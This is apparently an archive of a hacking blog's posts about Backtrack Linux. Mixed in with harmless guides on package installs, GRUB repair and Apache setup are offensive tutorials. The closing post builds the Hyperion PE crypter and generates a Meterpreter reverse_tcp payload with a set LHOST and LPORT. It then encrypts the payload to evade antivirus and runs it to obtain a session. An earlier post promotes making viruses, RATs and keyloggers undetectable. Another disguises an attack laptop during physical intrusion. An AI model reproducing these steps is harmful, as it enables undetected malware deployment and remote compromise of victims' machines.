Showing posts with label Backtrack. Show all posts
Showing posts with label Backtrack. Show all posts

Saturday, 20 July 2013

How To Make your Viruses, Payloads, Rat, Key-logger, fully Undetectable From Anti-viruses

Hi To All The 

Requirements:-
1. Backtrack 5 or any Linux Distro Having msfencoders
2. your own virus/rat/keylogger engine mine is test1.exe
follow The commands shown in figure:-
 perform all steps having root permission
Note:- click on image to see a bigger image

if You Have Any Query Write in Below Comments...
We Will Try To Figure out 



Monday, 20 May 2013

Troubleshooting Social Engineering Toolkit With Devender Mahto

Hello To The Mindbenders,
The Tutorial i Am Sharing Is Due to My Own Bad Luck, And you will hardly find this on any where in the web.
today i was very tensed so can't handle any more errors regarding my main os, i was in great trouble when i found that my set toolkit shows error like metasploit not found and then i tried to resolve this by removing all contents of set directory but mah bad luck by mistake i used accidently rm -rf *   in a new terminal of backtrack and that affected my home folder and i lost almost valuable 5gb data.

then i used testdisk but still not fetched my data. after that i decided to reinstall my set toolkit 


steps:-
Step 1.

 Install Synaptic package manager(skip this step if you have already installed synaptic package manager)
  • apt-get install synaptic


Step 2.
 remove set toolkit from synaptic package manager
  • open synaptic package manager and search for set then right click on set and mark for complete removal

Step 3.
then manually remove all 
Dependency of social engineering toolkit

so i again cd to set directory which is show in figure



Step 4. After removing all Dependency of set i planned to re-install The Latest Version Of Social Engineering Toolkit open a terminal and type
sudo bash
and then type exactly the same command as i did in figures




Step 5.

 Now run The Set toolkit use below commands in figures


Step 6.
Accept The EULA(End User Licence Agreement)




Step 7.
Then You Can See This Screen That Proves That Set is installed Correctly
 


Step 8.
Then Open A New Terminal And Do What i did This Will Install Set-toolkit universal means no matter where you are just type se-toolkit and you will get into social engineering toolkit



Step 9.
Starting The Se-Toolkit refer to below image
click image to see a bigger image

Step 10.
then from set menu choose 6th option To update Set Configuration

Now You Will no Longer Face Error Like Metasploit Not Found.

===(Next Is What...?)===

Monday, 13 May 2013

Installing Google Talk In backtrack Linux Distros

Welcome Back To The Mindbenders,


Aim:- To Install Google talk(Gtalk) application In Linux

Steps:-


Step 1
open Terminal And Type The Following commands (Text In Red)

root@bt:~# apt-get install prism-google-talk

Step 2

Now Go to Applications>Internet>Google Talk
Step 3

Google Down About Prism

===(Next Is What...?)===

Friday, 3 May 2013

Download Videos From Any Site In Linux or Backtrack


Hi To All The Mindbenders,
Today i am going to show off a simple tool required to download videos from the web, and The Tool is compatible  with any linux distro.

Steps To follow:
step 1
add repository of clipgrab (text in red)
root@bt:~# sudo add-apt-repository ppa:clipgrab-team/ppa
step 2
Update the added repository
root@bt:~# sudo apt-get update
step 3
install the clipgrab
root@bt:~# sudo apt-get install clipgrab

Now Enjoy with clipgrab just put the url of video you want to download

Friday, 19 April 2013

Building Webservers In Backtrack | The Mindbenders

Hi To All The Mindbenders,

Aim:- To Build A Server in Backtrack

Open Up Your terminal and use below commands(text in red)


root@bt:~# mkdir /var/www/themindbenders.tk

root@bt:~# chmod -R 775 /var/www/themindbenders.tk

root@bt:~# chown -R www-data:www-data /var/www/themindbenders.tk/

root@bt:~# service apache2 start2
 * Usage: /etc/init.d/apache2 {start|stop|restart|reload|force-reload|start-htcacheclean|stop-htcacheclean|status}

root@bt:~# service apache2 start2 start
 * Usage: /etc/init.d/apache2 {start|stop|restart|reload|force-reload|start-htcacheclean|stop-htcacheclean|status}

root@bt:~# service apache2 start
 * Starting web server apache2                                           [ OK ] 
root@bt:~# cowsay "now put some files in your website"
 ____________________________________
< now put some files in your website >
 ------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

root@bt:~# cp '/var/www/index.php' /var/www/themindbenders.tk/

root@bt:~# cp '/var/www/image.png' /var/www/themindbenders.tk/ 

root@bt:~# ifconfig

now after knowing your ip address give it your friends on the network
eg:- http://192.168.1.3/themindbenders.tk

===(Next Is What...?)===

Tuesday, 5 March 2013

Rooting Sony ericsson Xperia X8 E15i From Backtrack 5 | Android



Hi To All The Mindbenders,


Story:-   
15 days Ago, My Friend Shiva {vicky} suffered from a problem. and the 
Problem Against Him is Root Access On Applications He Newly Installed From Web and Warning Him That they Needs Root Access.
And He Was Unable To Run Some Cool And Best App on His Xperia X8 e15i.
Shiva Told All His Problems To me And I Said, You Have To Pay For It :P
He Ignored at The Moment By Answering that in market it will cost me less than you.
Then I Replied: Its All Upto you bro.
After 8 days he requested me to Root, Now Here I'm.

Now What Is root?
Root is Administrator {superuser}, and have all system access he can read/write system files.
Root Access means you can change the Permissions According to you for example, if you want to use live wallpaper for your android but your Vendor Blocked This Service, then you can run these kind of apps By Rooting your android.

Requirements:-
1. Sony Ericsson Xperia X8 E15i
2. Backtrack 5 r3 Because In This Os Android-sdk Comes Pre-installed
3. SuperOneClick For Rooting Through Its Exploits. {insrt captcha to go to download page on the next screen}
4. A Data Cable {Usb Connector} For Your Sony Ericsson Xperia X8 E15i. 

Steps:-

Step 1.
Turn usb Debugging On by Going Through Below Path
Settings --> Applications --> Development --> USB Debugging

Check in the Box Of Usb Debugging Option to Enable.


Step 2.
Connect Your Phone Using Data Cable {Usb Connector}

Step 3. 
After Attaching data Cable Your Xperia X8 Device will Popup A Menu With Two Options,
1. Connect Phone
2. Charge Phone

Step 4. 
Click on Charge Phone.

Step 5. 
Look On Your xperia X8 Notification Panel There Is A Notification {Usb Connection} Click On It Then It Will Ask you to Mount And Unmount SdCard,  Simply Click On Mount.
Note:- There is Another Notification about Usb Debugging but Don't Try To Touch It.

Step 6.
Then Download SuperOneClick And Paste Into Root {home} Folder Of Your Backtrack 5 R3.
Note:- Before Going To Further Steps Insure That You Are Logged In As Root In backtrack 5

Step 7.
now Unzip The Downloaded SuperOneClick Archive, Open Your Terminal of Backtrack 5 R3 and paste following text in red to unzip.

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~# unzip SuperOneClickv1.9.1-DevenderMahto[TheMindbenders].zip
--------------------------------------------------------------------------------------------------------------------------------- 
In Action you can skip this
--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~# unzip SuperOneClickv1.9.1-DevenderMahto[TheMindbenders].zip
Archive:  SuperOneClickv1.9.1-DevenderMahto[TheMindbenders].zip
Visit   http://www.mindbendersorg.blogspot.com
Like    https://www.facebook.com/themindbenders
Add    https://www.facebook.com/devendermahto

SuperOneClick Is Made For Rooting Xperia X8 E15i And Some Samsung Sets Having Android 2.1

   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/adblinux  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/AdbWinUsbApi.dll  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/automate.sh  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Root/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Root/su-v3  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Root/su-v2  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Root/su-v1  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Root/superuser.apk  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/psneuter  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/adb.exe  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/adbmac  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/AdbWinApi.dll  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Exploits/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Exploits/psneuter  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB/Exploits/GingerBreak  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/.zip  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/automate.sh  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Root/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Root/su-v3  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Root/Superuser.apk  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Root/su-v2  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Root/su-v1  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/SuperOneClick.exe  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x86/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x86/Samsung/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x86/Motorola/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x64/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x64/Samsung/
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/x64/Motorola/
 extracting: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Drivers/vendors.txt  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Dependencies/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Dependencies/sqlite3  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Dependencies/busybox  
   creating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Exploits/
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Exploits/psneuter  
  inflating: SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/Exploits/GingerBreak  
--------------------------------------------------------------------------------------------------------------------------------- 

Note:-  i Assumed That My File SuperOneClickv1.9.1-DevenderMahto[TheMindbenders].zip Is in Home (root) folder.

Step 5. 
change Current Working Directory using cd command below Text in red.

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~# cd SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]# 
--------------------------------------------------------------------------------------------------------------------------------- 

Step 6.
now again change working directory to your ADB folder

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]# cd ADB
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# 
--------------------------------------------------------------------------------------------------------------------------------- 

Step 7.
Now Change Permission of your adblinux tool in ADB folder run Below Command in same Terminal.

--------------------------------------------------------------------------------------------------------------------------------- root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# chmod 775 adblinux
--------------------------------------------------------------------------------------------------------------------------------- 

step 8.
start the adblinux for test purpose only you can skip this step

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# ./adblinux
Android Debug Bridge version 1.0.26

 -d                            - directs command to the only connected USB device
                                 returns an error if more than one USB device is present.
 -e                            - directs command to the only running emulator.
                                 returns an error if more than one emulator is running.
 -s <serial number>            - directs command to the USB device or emulator with
                                 the given serial number. Overrides ANDROID_SERIAL
                                 environment variable.
 -p <product name or path>     - simple product name like 'sooner', or
                                 a relative/absolute path to a product
                                 out directory like 'out/target/product/sooner'.
                                 If -p is not specified, the ANDROID_PRODUCT_OUT
                                 environment variable is used, which must
                                 be an absolute path.
 devices                       - list all connected devices
 connect <host>[:<port>]       - connect to a device via TCP/IP
                                 Port 5555 is used by default if no port number is specified.
 disconnect [<host>[:<port>]]  - disconnect from a TCP/IP device.
                                 Port 5555 is used by default if no port number is specified.
                                 Using this ocmmand with no additional arguments
                                 will disconnect from all connected TCP/IP devices.

device commands:
  adb push <local> <remote>    - copy file/dir to device
  adb pull <remote> [<local>]  - copy file/dir from device
  adb sync [ <directory> ]     - copy host->device only if changed
                                 (-l means list but don't copy)
                                 (see 'adb help all')
  adb shell                    - run remote shell interactively
  adb shell <command>          - run remote shell command
  adb emu <command>            - run emulator console command
  adb logcat [ <filter-spec> ] - View device log
  adb forward <local> <remote> - forward socket connections
                                 forward specs are one of: 
                                   tcp:<port>
                                   localabstract:<unix domain socket name>
                                   localreserved:<unix domain socket name>
                                   localfilesystem:<unix domain socket name>
                                   dev:<character device name>
                                   jdwp:<process pid> (remote only)
  adb jdwp                     - list PIDs of processes hosting a JDWP transport
  adb install [-l] [-r] [-s] <file> - push this package file to the device and install it
                                 ('-l' means forward-lock the app)
                                 ('-r' means reinstall the app, keeping its data)
                                 ('-s' means install on SD card instead of internal storage)
  adb uninstall [-k] <package> - remove this app package from the device
                                 ('-k' means keep the data and cache directories)
  adb bugreport                - return all information from the device
                                 that should be included in a bug report.

  adb help                     - show this help message
  adb version                  - show version num

DATAOPTS:
 (no option)                   - don't touch the data partition
  -w                           - wipe the data partition
  -d                           - flash the data partition

scripting:
  adb wait-for-device          - block until device is online
  adb start-server             - ensure that there is a server running
  adb kill-server              - kill the server if it is running
  adb get-state                - prints: offline | bootloader | device
  adb get-serialno             - prints: <serial-number>
  adb status-window            - continuously print device status for a specified device
  adb remount                  - remounts the /system partition on the device read-write
  adb reboot [bootloader|recovery] - reboots the device, optionally into the bootloader or recovery program
  adb reboot-bootloader        - reboots the device into the bootloader
  adb root                     - restarts the adbd daemon with root permissions
  adb usb                      - restarts the adbd daemon listening on USB
  adb tcpip <port>             - restarts the adbd daemon listening on TCP on the specified port
networking:
  adb ppp <tty> [parameters]   - Run PPP over USB.
 Note: you should not automatically start a PPP connection.
 <tty> refers to the tty for PPP stream. Eg. dev:/dev/omap_csmi_tty1
 [parameters] - Eg. defaultroute debug dump local notty usepeerdns

adb sync notes: adb sync [ <directory> ]
  <localdir> can be interpreted in several ways:

  - If <directory> is not specified, both /system and /data partitions will be updated.

  - If it is "system" or "data", only the corresponding partition
    is updated.

environmental variables:
  ADB_TRACE                    - Print debug information. A comma separated list of the following values
                                 1 or all, adb, sockets, packets, rwx, usb, sync, sysdeps, transport, jdwp
  ANDROID_SERIAL               - The serial number to connect to. -s takes priority over this if given.
  ANDROID_LOG_TAGS             - When used with the logcat option, only these debug tags are printed.

--------------------------------------------------------------------------------------------------------------------------------- 

Step 9.
serially run commands text in red

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# ./adblinux push Exploits/psneuter /data/local/tmp/psneuter
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
671 KB/s (585731 bytes in 0.851s)
--------------------------------------------------------------------------------------------------------------------------------- 

Note:-   your device must be connected at this moment and mounted your memory card.

Step 10.
copy su-v2 {exploit} into your android by below command text in red

--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# ./adblinux push Root/su-v2 /data/local/tmp/su 
614 KB/s (26264 bytes in 0.041s)
--------------------------------------------------------------------------------------------------------------------------------- 

Step 11.
--------------------------------------------------------------------------------------------------------------------------------- 
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# ./adblinux push Root/superuser.apk /data/local/tmp/superuser.apk
2308 KB/s (196521 bytes in 0.083s)
--------------------------------------------------------------------------------------------------------------------------------- 

Step 12.
Run These Commands Serially only text in  red are commands
Each Commands Would be Typed after $ (and commands are text in red)
--------------------------------------------------------------------------------
root@bt:~/SuperOneClickv1.9.1-DevenderMahto[TheMindbenders]/ADB# ./adblinux shell
$ cd /data/local/tmp
$ chmod 755 psneuter
$ ./psneuter
--------------------------------------------------------------------------------

Step 13. 
your will disconnect by itself or disconnect manually after running ./psneuter

Step 14. 
Again Connect it and Choose Charge Phone From Popup menu Containing two Options, and mount

Step 15. 
Run All COmmand As Same As In Below Manner To Avoid Bricking. 
Each Commands Would be Typed after # (and commands are text in red)

---------------------------------------------------------------------------------------------------------------------------------
root@bt:~/SuperOneClickv1.9.1-ShortFuse[1]/ADB# ./adblinux shell

# cd /data/local/tmp
# mount -o remount,rw -t yaffs2 /dev/block/mtdblock0 /system
# cat su > /system/bin/su
# cat superuser.apk > /system/app/superuser.apk
# chmod 06777 /system/bin/su
# chmod 777 /system/app/superuser.apk
# reboot
--------------------------------------------------------------------------------------------------------------------------------- 

Step 16.
Your Phone Will Restart And just wait untill it boot up
then go to home there you will find superuser app that's it all done
Try To Run App Like Busybox and others in root mode by granting permissions from superuser.


Feel Free To Ask ANy Query About This Post...



-:Warning:-
Do Not Install Application Like Clean Master Or Any SYs Cache Remover, If you do Your Phone Will Brick.
===(Next Is What?...)===

Tuesday, 4 December 2012

Recovering The GRUB 2 Boot Loader To Protect Your Previously Installed Operating Systems

Hi To All The Mindbenders,
As Like My Earlier Tutorials i'm not Going To Consume your important time. I am Always here to provide all The Mindbenders readers a Quick and Easy Solutions.
i already posted a tutorial about Recovering Grub2 but That Was Too Advance To Learn Recovering Grub2.
Grub is similar to boot-manager(Bootmgr) of windows.

But i'm a Linux Lover And Proudly Help Someone Who wants To Stay With Linux Distros.

Now We Are Looking Forward To This Post.

Note:- 1. only commands(text) in red must be typed in your terminal.
           2. Text in green after ===> sign indicates the uses of commands you are using at that  
               instant.
           3. sda5 is my partition having Linux OS, so Don't Behave Like Monkeys Use step 1 to  
               identify your Linux Partition Generally it is In Form Of Ext4 or Ext3 or something like 
               these Formats and for your Convenience Command will show you Linux in front of   
               your Partition.
          4. Refer To My Video For Better Results.

Steps To Follow:-

Step 0.
Boot from live Linux or backtrack 5 flash drive or any boot-able media of your choice, it could be your Dvd.

Step1.
Figure out where you need to install grub 2 means we need to identify our Partition having Linux.

root@bt:~# sudo fdisk -l               =================> List All Partition
root@bt:~# ls                                 =================> List All the Files/folders of your  
                                                                                                  current mounted partition having root  
                                                                                                  Privellages                                         

Step2.
Mount the Partition where you need to install the grub2

root@bt:~# sudo mount /dev/sda5 /mnt          ========> here sda5 is the partition where linux  
                                                                                                  is and we mounted in mnt folder

root@bt:~# mount                          ================> List all the mounted partitions

Step3.
Mount the Partition to an alternate location

root@bt:~# sudo mount /dev/sda5 /mnt/boot

Step4.
Create an unbreakable link from /dev folder on the live image you booted from to the /dev folder on the partition you mounted to /mnt

root@bt:~# sudo mount --bind /dev /mnt/dev/

Step 5.
CHROOT from the live image's root to the mounted partition's root
chroot temporarly changes the root of the filesystem directory.

root@bt:~# pwd                             ================> Print Working Directory To Check  
                                                                                                The Current Root Privellages 
root@bt:~# sudo chroot /mnt

root@bt:~# sudo mount               ================> List All The Mounted Partitions 

root@bt:~# pwd

root@bt:~# ls                                 =================> List All the Files/folders of your  
                                                                                                  current mounted partition having root  
                                                                                                  Privellages                                      

if yoou found your linux hard drive content then you are almost on track 

Step 6. 
Now Reinstall the grub2 loader to the drive on which exists the partition you mounted previously.

root@bt:~# sudo grub-install /dev/sda      ==========> Install Grub In Your Hard Drive 
                                                                                                Which is sda your primary hard drive.

root@bt:~# pwd

now exit your chroot shell

root@bt:~# exit

Step7.

cleanly unmount all the partitions you previously mounted

root@bt:~# sudo umount /mnt/dev
root@bt:~# sudo umount /mnt/boot
root@bt:~# sudo umount /mnt


now reboot...

root@bt:~# sudo reboot

pull out your live flash disk

when Linux or backtrack says to login simply login and do not try to type startx in case of backtrack Use below Command Before typing startx.
And for other linux, Login To System and then open terminal then use commands.

root@bt:~# os-prober

root@bt:~# update-grub

root@bt:~# startx                =================> Only For Backtrack Linux                                         

Story Behind The Tutorial:-
I know how much it hurts when you Wants to upgrade but instead of that You Got Problems Like Previously installed linux or any other os is missing from your boot and i got the same situations when i was upgraded to Windows 7 to windows 8 Rtm. i was shocked when i rebooted my Laptop and didn't find my previously installed backtrack 5 grub menu, i can't tell you how much sad i was at that time then i asked everyone But i had a Huge List Of No Hahah. And Finally Referred to some Linux Forums And Found the Fix... Then I Recorded a video of fixing the same in ubuntu...


Tuesday, 27 November 2012

Making BackTrack5 look like XP | Social Engineering

Hello to All The Mindbenders,
Okay, so the first thing you’re wondering is 
Why the hell would you want to do this?

Well the answer becomes more obvious when the scenario is set:
You’re on a social engineering job and you’ve managed to gain access to the target building, you walk around for a bit to see if any of the desks look free. After a while you decide to sit down at what seems like an unoccupied desk. You calmly pull out your laptop and turn it on. As the laptop is booting you start looking for an Ethernet cable to plug into your laptop, you find one and plug it in. Social engineering phase complete, pentest about to start. The hard work is over and the fun is about to begin…. until, someone walks past your laptop and sees you’re bright red coloured BackTrack wall paper.
this one is nice trick just keep it low. you know what i mean.
you dont want to have that Big red dragon logon on your screen. let them tought it was a noob OS lol :P

 
 
You’re no longer being stealthy, the wallpaper looks aggressive and the nature of your visit is becoming a concern to the other workers who realise they’ve never seen you before. Next thing you know you’ve been collared by security and before you know it you’ve kicked out of the building, all because of the wallpaper on your laptop!
This script originally came from here but I have neatened it up and got it working with BackTrack. So the idea of this script is to make it quick to turn your BackTrack5 gnome build into something that resembles Windows XP to help you blend in with the crowd.
The package can be downloaded from here (please don’t hotlink as I might move the file to a different server to cope with all the downloads….):

 


 

Sunday, 25 November 2012

Customizing Backtrack 5 by Devender Mahto


Like
https://www.facebook.com/themindbenders

Ask
https://www.facebook.com/devendermahto

Thursday, 22 November 2012

How to Install BackTrack 5 Proper Tutorial



For Security Researchers who wants to do penetration testing or some extra in Security Field then Backtrack 5 is a good choice...

First you need to download backtrack 5 from this link 

http://www.backtrack-linux.org/downloads/ 

and also download UNetbootin which is required For Creating Live Usb Of backtrack

http://unetbootin.sourceforge.net/ 

Requirement :
1. USB (Flash Drive) (Minimum USB Drive capacity 4 GB)
2. Backtrack 5 ISO file, md5sum verified(which is available on above link)
3. UNetbootin

Procedure to burn your USB.
> Plug in ur USB Drive
> Format the USB drive to FAT32
> Start Unetbootin and select the "diskimage" option, choose a BackTrack 5 ISO file which u've    
    downloaded at the first of this tutorial.
> Select the amount of space to use for persistence in MB (optional)
> Select your USB drive and click "OK" for creating a bootable BackTrack USB drive
> Once rebooted, remember that the default username is root and password toor

Your USB is ready to install BackTrack5...

first of all Boot the Backtrack Live Environment.
At the bash prompt, type startx to enter the GUI.
Double click the install-Backtrack.sh which u can see on the Desktop.

step by step Installation process...
Select the language and click on the forward button.
Select ur geographical location and time zone den click on the forward button.
Choose ur keyboard layout, or leave default.
now in the next screen choose the "Erase and use the entire disk" option If you Want To Format your whole hard drive and install only backtrack in a single partition, 
or  choose "manually advanced" option to select the drive you want to format and install backtrack.
and click Forward.
the next screen will show you the installation options, make sure everything is fine then click on forward button to start installation process.
when installation will finish you'll need to press the restart button and then enjoy Backtrack 5.

NOTE : default user name is : root and pass : toor

Dont forget to change it...
you can also use BackTrack 5 with different operating systems like Win XP, Win 7,etc with dual boot setup.
K33p growing, And K33p Yourself updated.

I Enjoyed the whole tutorial While Blogging.
Comments are welcomed...

Backtrack not Found After Installing new windows 8 ? Solved



Problem:
I had Windows 7 installed, and backtrack R2 (just upgraded to R3). I then installed Windows 8 (formatted my Main windows HDD, not my backtrack HDD). Now Windows installed his boot loader.
I Faced This Problem And Tackle My Worries Without reinstalling Any Os... I'm too Smart.
Coz I Know That If there is a problem then There is a solution for it also...
So, Is there anyway to get the GRUB loader back without reinstalling backtrack?

Solution:
Just please one thing that is not written in guides and I belive they take it for granted: If you are to recover the grub using a live CD, here is the "taken for granted" issue and looks pretty logic, but many many people do not do it: use the 64 bit distro if trying to recover a 64 bit system with grub, and use 32 bit live cd for 32-bit distro to recover...IF you do not do that, when recovering grub, you will get mounting errors ("chroot: cannot run command `/bin/bash': Exec format error").


Here is the way I do it, is the easiest way from live cd (remember to use the 32 or 64 bit version according to the one you want to recover):

Insert Live CD (Ubuntu distro with grub2 like Lucid 10.04) and load Ubuntu. 



then open a terminal and type(text in red only):

root@bt:~# sudo fdisk -l                                            ====> (See your BT partition: sda1, sda2, etc)

root@bt:~# sudo mount /dev/sdax /mnt                   ====> (mount it) {Where x is your sda drive                  
                                                                                             no. eg: sda7 is my drive and here x is 7}

root@bt:~# sudo grub-install --root-directory=/mnt/ /dev/sda            ====> (install grub, here DO     
                                                                                                            NOT install in sdax, just sda or  
                                                                                                       whatever your HDD is mapped at).

Reboot (# shutdown -r now) and if any OS is missing in grub menu, just enter BT and use the 

root@bt:~# os-prober 

command in terminal: "os-prober", 
then just update grub: 

root@bt:~# update-grub

Now You Are Free To Use Your Dual Boot System... Ready... :D

Be Brave, K33p Yourself Updated...

Suggestions and Questions are welcomed...

Thursday, 15 November 2012

Msfupdate not working with "no version information available" error by Shubham Mittal (@k@ Upgoingstaar)


A few days back while working with my testings and research, i came across an error which was continously depriving me of updating my metasploit framework. Error message was something like this :

(Click on Image to Enlarge)

No version available and blah blah blah. For that, i ignored it for a couple of days due to workload and downloaded exploits manually. But when it seemed kiddish to me, i got into roots. I soon realized that the "no version information available" error , here, meant that the library metasploit does not have a version to refer and hence it is not updating to any further version. Was quite kiddish, but realistic too. So i checked its libraries :

(Click on Image to Enlarge)

libssl.so.0.9.8 do not have a link to /usr/lib/ where as the entire library actually relies on the same. So what we need to do is : 
Backup the library that is erroring msf.
Create a link between the library msf and /usr/lib/

Do this : 

(Click on Image to Enlarge)

Once you are done with all this stuff, go ahead and update your metasploit. You will get a smile on your face.

(Click on Image to Enlarge)

So this was how you dont need to put back your actions if you get any error anywhere, just like in case of msf. 

Enjoy hacking, enjoy exploitation. :)

Bypassing Antivirus with PE Crypters by Shubham Mittal (@k@ Upgoingstaar)

Well most of the time when we do penetration test, we are facing a super cool AV protection which stops us to execute our lovely EXEs, shellcodes, etc.

I was looking around the same and from a presentation of Mr. Dave Kennedy at DerbyCon, i got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging it here and there, i found that shellcodexec is a small utility to inject a Shellcode into any process and thus execute your malicious intentions. This is done with approach that when there is no file at all, what signature will AVs match? However shellcodexec is itself getting caught nowadays and therefore I will not suggest you to go for it.

On the other hand, PE Crypters (from Nullsecurity team) will encrypt a Binary file with a sexy crypting approach and thus can be used to bypass the AV.The whole project is running under the name of HYPERION project and is a proper working way to mess around with AVs. So lets start.

Well there has been great stuff for AVs detecting the templates with which we encrypt our EXE and likely the decryption approach of the program to reach the actuall offset, AVs started doing the same with the result of "Detection". In this PE Cryters, payload is not scrambled, instead it is encapsulated. A different key as a cipher is used every time and at the time of execution, Brute Force can be done. So it will take time, huh? Well yeah it will take time if our key is long. We will keep our key short and everything will go fine. This is whot Hyperion Pe Crypters will do; in short. A weak 128 bit AES key is used to encapsulate the packet which is simply brute forced at the time of execution. If you want to give it a hardcore look, check out this research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf)

Anyways, for super cool guys, this was enough. But as only the Source files are available by now, For those who are new to these things, that can be a little troublesome :P; Well let me give a go through. First of all choose your platform; M preferring Linux all the way but its your system, and your choice too.

Next Download the project;
or use: wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip



















Uzip It.

unzip Hyperion-1.0.zip
























Change the directory, and compile it.

cd Hyperion-1.0.zip


wine /root/drive_c/MinGW/bin/g++  Src/Crypter/*.cpp -o shubham.exe



Once you have created executable for Crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating a msfpayload for reverse connection and once it is crypted using Hyperion, it must bypass AV along with sending back the reverse connection.

Create the Payload.4
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe





Scan it. 
Once the payload is ready, we will scan it first (without crypting).






Lets Crypt it with Hyperion.

wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe


ls -l





Scan it.
No Detection






Execute it.
As soon as you will execute it, it will start brute forcing which will make the CPU Usage 100%.





Enjoy It.
As soon as the brute force will get over, CPU Usage will reduce to normal and a session will get generated.







I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)